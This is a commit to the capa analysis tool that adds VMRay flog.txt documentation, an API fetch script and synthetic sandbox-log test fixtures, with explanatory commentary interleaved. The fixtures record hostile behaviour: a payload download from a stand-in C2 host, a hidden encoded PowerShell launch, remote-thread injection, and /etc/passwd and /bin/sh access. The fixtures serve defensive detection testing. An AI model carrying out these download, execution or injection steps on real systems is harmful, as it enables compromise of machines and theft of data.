Commit b58fbeb

vmray: add docs, fetch helper, and fixture-based regression tests for flog.txt
Addresses reviewer feedback on #2878:

1. Document flog.txt vs full archive trade-offs in doc/usage.md with a comparison table (available features, how to obtain, file size).
2. Add scripts/fetch-vmray-flog.py: given a VMRay instance URL, API key, and sample SHA-256, it downloads flog.txt via the REST API and optionally runs capa against it.
3. Add fixture-based regression tests (tests/fixtures/vmray/flog_txt/) with three representative flog.txt files:
   - windows_apis.flog.txt: Win32 APIs, string args with backslash paths, numeric args, multi-process
   - linux_syscalls.flog.txt: Linux sys_-prefixed calls (prefix stripped from every call)
   - string_edge_cases.flog.txt: paths with spaces, UNC paths, URLs, empty strings

tests/test_vmray_flog_txt.py gains 14 new feature-presence tests covering API, String, and Number extraction at the call scope, plus negative checks (double-backslash must not appear; sys_ prefix must not appear).

Fixes #2878
1 parent eca9286 commit b58fbeb

7 files changed

+709
-11
lines changed

CHANGELOG.md

Lines changed: 1 addition & 0 deletions
@@ -6,6 +6,7 @@
 
 - ghidra: support PyGhidra @mike-hunhoff #2788
 - vmray: support parsing flog.txt (Download Function Log) without full ZIP @devs6186 #2452
+- vmray: add flog.txt vs archive docs, fetch-vmray-flog.py helper, and fixture-based regression tests @devs6186 #2878
 - vmray: extract number features from whitelisted void_ptr parameters (hKey, hKeyRoot) @adeboyedn #2835
 
 ### Breaking Changes

doc/usage.md

Lines changed: 30 additions & 0 deletions
@@ -12,6 +12,36 @@ See `capa -h` for all supported arguments and usage examples.
 | [**CAPE**](https://www.mandiant.com/resources/blog/dynamic-capa-executable-behavior-cape-sandbox) | capa run on sandbox report (e.g. CAPE, VMRay ZIP or VMRay flog.txt) | Dynamic analysis of sandbox output |
 | [**Web (capa Explorer)**](https://mandiant.github.io/capa/explorer/) | Web UI (upload JSON or load from URL) | Sharing results, viewing from VirusTotal or similar |
 
+## VMRay: flog.txt vs full analysis archive
+
+When analysing VMRay output you can give capa either the full analysis **ZIP archive** or just the **flog.txt** function-log file.
+Choose based on what you have access to and what features you need.
+
+| | **flog.txt** (free, "Download Function Log") | **Full VMRay ZIP archive** |
+|-|-|-|
+| **How to obtain** | VMRay Threat Feed → Full Report → *Download Function Log* | Purchased subscription; *Download Analysis Archive* |
+| **File size** | Small text file | Large encrypted ZIP |
+| **Dynamic API calls** | ✓ | ✓ |
+| **String arguments** | ✓ (parsed from text) | ✓ (from structured XML) |
+| **Numeric arguments** | ✓ (parsed from text) | ✓ (from structured XML) |
+| **Static imports / exports** | ✗ | ✓ |
+| **PE/ELF section names** | ✗ | ✓ |
+| **Embedded file strings** | ✗ | ✓ |
+| **Base address** | ✗ | ✓ |
+| **Argument names** | ✓ (text-format `name=value`) | ✓ (structured XML) |
+
+**When to use flog.txt:** You only have access to VMRay Threat Feed without a full subscription, or you want a quick first pass using only the freely-available function log.
+
+**When to use the full archive:** You need static features (imports, exports, strings, section names) in addition to dynamic behaviour, or you want the highest-fidelity argument data.
+
+```
+# flog.txt: free, dynamic features only (API calls and their arguments)
+capa path/to/flog.txt
+
+# Full VMRay archive: requires subscription, richer features
+capa path/to/analysis_archive.zip
+```
+
 ## tips and tricks
 
 ### only run selected rules

scripts/fetch-vmray-flog.py

Lines changed: 270 additions & 0 deletions
@@ -0,0 +1,270 @@
+#!/usr/bin/env python3
+# Copyright 2025 Google LLC
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+"""
+Fetch the VMRay Function Log (flog.txt) for a sample and optionally run capa against it.
+
+Given a sample SHA-256 hash and VMRay credentials, this script:
+  1. Looks up the sample on the VMRay instance.
+  2. Finds the most-recent analysis for that sample.
+  3. Downloads the flog.txt (Download Function Log) from the analysis archive.
+  4. Optionally runs capa against the downloaded file.
+
+Requirements:
+    pip install requests
+
+Usage::
+
+    python scripts/fetch-vmray-flog.py \\
+        --url https://your-vmray.example.com \\
+        --apikey YOUR_API_KEY \\
+        --sha256 d46900384c78863420fb3e297d0a2f743cd2b6b3f7f82bf64059a168e07aceb7 \\
+        --output /tmp/sample_flog.txt
+
+    # Fetch and immediately run capa:
+    python scripts/fetch-vmray-flog.py \\
+        --url https://your-vmray.example.com \\
+        --apikey YOUR_API_KEY \\
+        --sha256 d46900384c78863420fb3e297d0a2f743cd2b6b3f7f82bf64059a168e07aceb7 \\
+        --run-capa
+
+VMRay API reference:
+    https://docs.vmray.com/documents/api-reference/
+
+Note: this script requires a VMRay account. The flog.txt itself is freely available
+("Download Function Log") in the VMRay Threat Feed web UI, but downloading it
+programmatically via the REST API requires valid API credentials.
+"""
+
+import argparse
+import logging
+import subprocess
+import sys
+from pathlib import Path
+
+import requests
+
+logger = logging.getLogger(__name__)
+
+# ---------------------------------------------------------------------------
+# VMRay REST API helpers
+# ---------------------------------------------------------------------------
+
+_FLOG_TXT_ARCHIVE_PATH = "logs/flog_txt"
+
+
+def _session(url: str, apikey: str) -> requests.Session:
+    """Return an authenticated requests.Session for the given VMRay instance."""
+    s = requests.Session()
+    s.headers.update(
+        {
+            "Authorization": f"api_key {apikey}",
+            "Accept": "application/json",
+        }
+    )
+    s.verify = True  # set to False only when using self-signed certificates
+    s.base_url = url.rstrip("/")  # type: ignore[attr-defined]
+    return s
+
+
+def _get(session: requests.Session, path: str, **kwargs) -> dict:
+    url = f"{session.base_url}{path}"  # type: ignore[attr-defined]
+    resp = session.get(url, **kwargs)
+    resp.raise_for_status()
+    return resp.json()
+
+
+def _get_bytes(session: requests.Session, path: str, **kwargs) -> bytes:
+    url = f"{session.base_url}{path}"  # type: ignore[attr-defined]
+    resp = session.get(url, **kwargs)
+    resp.raise_for_status()
+    return resp.content
+
+
+def lookup_sample(session: requests.Session, sha256: str) -> dict:
+    """
+    Return the VMRay sample record for the given SHA-256.
+    Raises ValueError if the sample is not found.
+    """
+    data = _get(session, f"/rest/sample/sha256/{sha256}")
+    if data.get("result") != "ok" or not data.get("data"):
+        raise ValueError(f"sample not found on VMRay instance: {sha256}")
+    # data["data"] is a list; take the first entry
+    return data["data"][0]
+
+
+def get_latest_analysis(session: requests.Session, sample_id: int) -> dict:
+    """
+    Return the most recent analysis (highest analysis_id) for the given VMRay sample ID.
+    No status filtering is applied, so the result is not guaranteed to be a finished analysis.
+    Raises ValueError if no analysis is found.
+    """
+    data = _get(session, "/rest/analysis", params={"sample_id": sample_id})
+    analyses = data.get("data", [])
+    if not analyses:
+        raise ValueError(f"no analyses found for sample_id={sample_id}")
+    # Sort by analysis_id descending (newest first)
+    analyses.sort(key=lambda a: a.get("analysis_id", 0), reverse=True)
+    return analyses[0]
+
+
+def download_flog_txt(session: requests.Session, analysis_id: int) -> bytes:
+    """
+    Download the flog.txt content for the given VMRay analysis ID.
+
+    The dedicated function-log export endpoint is tried first. If it fails
+    or returns no data, we fall back to the analysis archive endpoint and
+    request only the flog_txt entry using the ``file_filter[]`` query parameter.
+    """
+    # Try the dedicated log endpoint first (VMRay >= 2024.x)
+    try:
+        content = _get_bytes(
+            session,
+            f"/rest/analysis/{analysis_id}/export/v2/logs/flog_txt/binary",
+        )
+        if content:
+            return content
+    except requests.HTTPError as exc:
+        # Not fatal: older instances may lack this endpoint, so use the fallback.
+        logger.debug("dedicated flog endpoint failed (%s), falling back to archive", exc)
+
+    # Fallback: download via the analysis archive with a file filter
+    content = _get_bytes(
+        session,
+        f"/rest/analysis/{analysis_id}/archive",
+        params={"file_filter[]": _FLOG_TXT_ARCHIVE_PATH},
+    )
+    return content
+
+
+# ---------------------------------------------------------------------------
+# main
+# ---------------------------------------------------------------------------
+
+
+def main(argv=None):
+    if argv is None:
+        argv = sys.argv[1:]
+
+    parser = argparse.ArgumentParser(
+        description="Download VMRay flog.txt for a sample hash and (optionally) run capa."
+    )
+    parser.add_argument(
+        "--url",
+        required=True,
+        metavar="URL",
+        help="Base URL of your VMRay instance, e.g. https://cloud.vmray.com",
+    )
+    parser.add_argument(
+        "--apikey",
+        required=True,
+        metavar="KEY",
+        help="VMRay REST API key (Settings → API Keys).",
+    )
+    parser.add_argument(
+        "--sha256",
+        required=True,
+        metavar="SHA256",
+        help="SHA-256 hash of the sample to analyse.",
+    )
+    parser.add_argument(
+        "--output",
+        metavar="PATH",
+        help="Where to save the downloaded flog.txt. Defaults to <sha256>_flog.txt in the current directory.",
+    )
+    parser.add_argument(
+        "--run-capa",
+        action="store_true",
+        dest="run_capa",
+        help="After downloading, run 'capa <output>' and print the results.",
+    )
+    parser.add_argument(
+        "--capa-args",
+        metavar="ARGS",
+        default="",
+        help="Extra arguments forwarded to capa (only used with --run-capa).",
+    )
+    parser.add_argument(
+        "--no-verify-ssl",
+        action="store_false",
+        dest="verify_ssl",
+        help="Disable SSL certificate verification (useful for on-premise instances with self-signed certs).",
+    )
+    parser.add_argument(
+        "-d", "--debug", action="store_true", help="Enable debug logging."
+    )
+    args = parser.parse_args(argv)
+
+    logging.basicConfig(
+        level=logging.DEBUG if args.debug else logging.INFO,
+        format="%(levelname)s: %(message)s",
+    )
+
+    output_path = Path(args.output) if args.output else Path(f"{args.sha256}_flog.txt")
+
+    session = _session(args.url, args.apikey)
+    session.verify = args.verify_ssl  # type: ignore[assignment]
+
+    # Step 1: look up sample
+    logger.info("looking up sample %s …", args.sha256)
+    try:
+        sample = lookup_sample(session, args.sha256)
+    except (requests.HTTPError, ValueError) as exc:
+        logger.error("failed to find sample: %s", exc)
+        return 1
+
+    sample_id: int = sample["sample_id"]
+    logger.debug("found sample_id=%d", sample_id)
+
+    # Step 2: find the latest analysis
+    logger.info("fetching analysis list for sample_id=%d …", sample_id)
+    try:
+        analysis = get_latest_analysis(session, sample_id)
+    except (requests.HTTPError, ValueError) as exc:
+        logger.error("failed to find analysis: %s", exc)
+        return 1
+
+    analysis_id: int = analysis["analysis_id"]
+    logger.debug("using analysis_id=%d", analysis_id)
+
+    # Step 3: download flog.txt
+    logger.info("downloading flog.txt for analysis_id=%d …", analysis_id)
+    try:
+        flog_bytes = download_flog_txt(session, analysis_id)
+    except requests.HTTPError as exc:
+        logger.error("failed to download flog.txt: %s", exc)
+        return 1
+
+    if not flog_bytes:
+        logger.error(
+            "received empty response; flog.txt may not be available for this analysis"
+        )
+        return 1
+
+    output_path.write_bytes(flog_bytes)
+    logger.info("saved flog.txt → %s (%d bytes)", output_path, len(flog_bytes))
+
+    # Step 4 (optional): run capa
+    if args.run_capa:
+        capa_cmd = ["capa", str(output_path)] + (
+            args.capa_args.split() if args.capa_args else []
+        )
+        logger.info("running: %s", " ".join(capa_cmd))
+        result = subprocess.run(capa_cmd)
+        return result.returncode
+
+    return 0
+
+
+if __name__ == "__main__":
+    sys.exit(main())
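The script writes whatever bytes `download_flog_txt` returns straight to disk. Below is a minimal sketch of a sanity check that could run before the write. It assumes, without confirmation from this commit, that the archive fallback may return a ZIP container rather than plain text. It also assumes a valid flog.txt carries the `# Flog Txt Version` header seen in the fixtures. `classify_download` and `FLOG_MARKER` are hypothetical names, not part of the script.

```python
import io
import zipfile

# Header marker taken from the fixtures in this commit ("# Flog Txt Version 1").
FLOG_MARKER = b"# Flog Txt Version"


def classify_download(data: bytes) -> str:
    """Return "zip", "flog", or "unknown" for a downloaded payload (hypothetical helper)."""
    # Assumption: the archive fallback may hand back a ZIP container.
    if zipfile.is_zipfile(io.BytesIO(data)):
        return "zip"
    # The marker sits in the comment header, so the first few KiB are enough.
    if FLOG_MARKER in data[:4096]:
        return "flog"
    return "unknown"
```

A caller could refuse to save anything that is not classified as `"flog"`, or log a warning so the user knows the file needs unpacking first.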
Lines changed: 43 additions & 0 deletions
@@ -0,0 +1,43 @@
+# Log Creation Date: 02.01.2025 12:00:00
+# Analyzer Version: 2024.4.1
+# Flog Txt Version 1
+
+Process:
+id = "1"
+os_pid = "0x1234"
+os_parent_pid = "0x1"
+parent_id = "0"
+image_name = "backdoor"
+filename = "/tmp/backdoor"
+cmd_line = "/tmp/backdoor"
+monitor_reason = "analysis_target"
+
+Region:
+id = "1"
+name = "stack"
+
+Thread:
+id = "1"
+os_tid = "0x1234"
+[0001.000] sys_read (fd=0x3, buf=0x7ffe1234, count=0x1000) returned 0x100
+[0001.001] sys_write (fd=0x1, buf=0x7ffe1234, count=0x6) returned 0x6
+[0001.002] sys_open (pathname="/etc/passwd", flags=0x0, mode=0x0) returned 0x3
+[0001.003] sys_connect (sockfd=0x4, addr=0x7ffe2000, addrlen=0x10) returned 0x0
+[0001.004] sys_socket (domain=0x2, type=0x1, protocol=0x0) returned 0x4
+[0001.005] sys_execve (filename="/bin/sh", argv=0x7ffe3000, envp=0x7ffe4000) returned 0x0
+[0001.006] sys_fork () returned 0x2345
+[0001.007] sys_getuid () returned 0x0
+[0001.008] sys_setuid (uid=0x0) returned 0x0
+[0001.009] sys_chmod (pathname="/tmp/backdoor", mode=0x1ed) returned 0x0
+[0001.010] sys_unlink (pathname="/tmp/.hidden") returned 0x0
+[0001.011] sys_time (tloc=0x0) returned 0x677f2000
+[0001.012] sys_ptrace (request=0x0, pid=0x1, addr=0x0, data=0x0) returned 0x0
+[0001.013] sys_prctl (option=0xf, arg2=0x0, arg3=0x0, arg4=0x0, arg5=0x0) returned 0x0
+[0001.014] sys_mmap (addr=0x0, length=0x1000, prot=0x7, flags=0x22, fd=0xffffffff, offset=0x0) returned 0x7f0000
+[0001.015] sys_mprotect (start=0x7f0000, len=0x1000, prot=0x5) returned 0x0
+[0001.016] sys_munmap (addr=0x7f0000, length=0x1000) returned 0x0
+[0001.017] sys_bind (sockfd=0x4, addr=0x7ffe2000, addrlen=0x10) returned 0x0
+[0001.018] sys_listen (sockfd=0x4, backlog=0x5) returned 0x0
+[0001.019] sys_accept (sockfd=0x4, addr=0x7ffe2010, addrlen=0x7ffe2020) returned 0x5
+[0001.020] sys_sendto (sockfd=0x5, buf=0x7ffe5000, len=0x20, flags=0x0, dest_addr=0x0, addrlen=0x0) returned 0x20
+[0001.021] sys_recvfrom (sockfd=0x5, buf=0x7ffe5000, len=0x1000, flags=0x0) returned 0x40
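The commit message states that the `sys_` prefix is stripped from Linux calls. Here is a minimal sketch of how one call line from this fixture could be split into an API name, the raw argument text, and the return value. The regular expression and the `parse_call` helper are illustrative assumptions based only on the line shape visible in the fixture. They are not capa's actual parser.

```python
import re
from typing import Optional, Tuple

# Assumed line shape, copied from the fixture:
#   [0001.002] sys_open (pathname="/etc/passwd", flags=0x0, mode=0x0) returned 0x3
CALL_RE = re.compile(
    r"^\[(?P<ts>\d+\.\d+)\]\s+(?P<name>\w+)\s*\((?P<args>.*)\)\s+returned\s+(?P<ret>\S+)$"
)


def parse_call(line: str) -> Optional[Tuple[str, str, str]]:
    """Return (api_name, raw_args, return_value), or None for non-call lines."""
    m = CALL_RE.match(line.strip())
    if m is None:
        return None  # header comments, "Process:" blocks, key = "value" lines
    name = m.group("name")
    # Strip the Linux syscall prefix so the API feature reads "open", not "sys_open".
    if name.startswith("sys_"):
        name = name[len("sys_"):]
    return name, m.group("args"), m.group("ret")
```

The greedy `.*` relies on `) returned` appearing only once per line. A string argument that itself contains that text would need a real tokenizer.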
Lines changed: 37 additions & 0 deletions
@@ -0,0 +1,37 @@
+# Log Creation Date: 03.01.2025 08:00:00
+# Analyzer Version: 2024.4.1
+# Flog Txt Version 1
+
+Process:
+id = "1"
+os_pid = "0x2000"
+os_parent_pid = "0x4"
+parent_id = "0"
+image_name = "edgecase.exe"
+filename = "c:\\users\\test\\edgecase.exe"
+cmd_line = "edgecase.exe"
+monitor_reason = "analysis_target"
+
+Region:
+id = "5"
+name = "private_0x0000000000010000"
+
+Thread:
+id = "1"
+os_tid = "0x2100"
+[0001.000] GetCurrentProcess () returned 0xffffffffffffffff
+[0001.001] CreateFileW (lpFileName="C:\\path with spaces\\file name.txt", dwDesiredAccess=0x40000000) returned 0x8
+[0001.002] RegOpenKeyExW (hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019) returned 0x0
+[0001.003] CreateFileW (lpFileName="\\\\server\\share\\document.docx", dwDesiredAccess=0x80000000) returned 0x9
+[0001.004] CreateFileW (lpFileName="", dwDesiredAccess=0x80000000) returned 0xffffffffffffffff
+[0001.005] OutputDebugStringA (lpOutputString="debug: value=0x1234 status=ok") returned 0x0
+[0001.006] MessageBoxW (hWnd=0x0, lpText="An error occurred.\nPlease try again.", lpCaption="Error", uType=0x10) returned 0x1
+[0001.007] SetEnvironmentVariableW (lpName="PATH", lpValue="C:\\Windows\\system32;C:\\Windows") returned 0x1
+[0001.008] URLDownloadToFileW (pCaller=0x0, szURL="https://c2.example.com/payload.bin", szFileName="C:\\Users\\test\\AppData\\Local\\Temp\\payload.bin", dwReserved=0x0) returned 0x0
+[0001.009] CryptHashData (hHash=0x100, pbData=0x1234, dwDataLen=4096, dwFlags=0x0) returned 0x1
+[0001.010] connect (s=0x4, name=0x7ffe2000, namelen=0x10) returned 0x0
+[0001.011] send (s=0x4, buf=0x7ffe5000, len=256, flags=0x0) returned 256
+[0001.012] recv (s=0x4, buf=0x7ffe5000, len=4096, flags=0x0) returned 128
+[0001.013] CreateProcessW (lpApplicationName=NULL, lpCommandLine="powershell.exe -nop -w hidden -enc BASE64PAYLOAD", dwCreationFlags=0x8000000) returned 0x1
+[0001.014] WriteProcessMemory (hProcess=0xffffffffffffffff, lpBaseAddress=0x140001000, lpBuffer=0x1000, nSize=4096) returned 0x1
+[0001.015] CreateRemoteThread (hProcess=0xffffffffffffffff, lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x140001000, lpParameter=0x0, dwCreationFlags=0x0) returned 0x200
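The edge cases in this fixture map onto the negative check named in the commit message: a double backslash must not appear in extracted strings. The sketch below shows one way the argument text of a call could be turned into string and number values. `ARG_RE` and `parse_args` are hypothetical, and the rule that only `\\` is collapsed (other escapes such as `\n` are left as written) is an assumption. This is not capa's actual extraction logic.

```python
import re
from typing import Dict, Union

# name=value pairs; a value is either a double-quoted string (which may
# contain backslash escapes, spaces, and commas) or a bare token.
ARG_RE = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|[^,\s)]+)')


def parse_args(arg_text: str) -> Dict[str, Union[str, int]]:
    """Map argument names to str (quoted values) or int (numeric values)."""
    out: Dict[str, Union[str, int]] = {}
    for name, raw in ARG_RE.findall(arg_text):
        if raw.startswith('"'):
            # Drop the quotes and collapse escaped backslashes: \\ becomes \
            out[name] = raw[1:-1].replace("\\\\", "\\")
        else:
            try:
                out[name] = int(raw, 0)  # base 0 accepts both 0x10 and 4096
            except ValueError:
                continue  # bare non-numeric tokens such as NULL are skipped
    return out
```

Because a quoted value is consumed as a single match, the `value=0x1234` text inside the `OutputDebugStringA` string is not mistaken for a separate argument.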
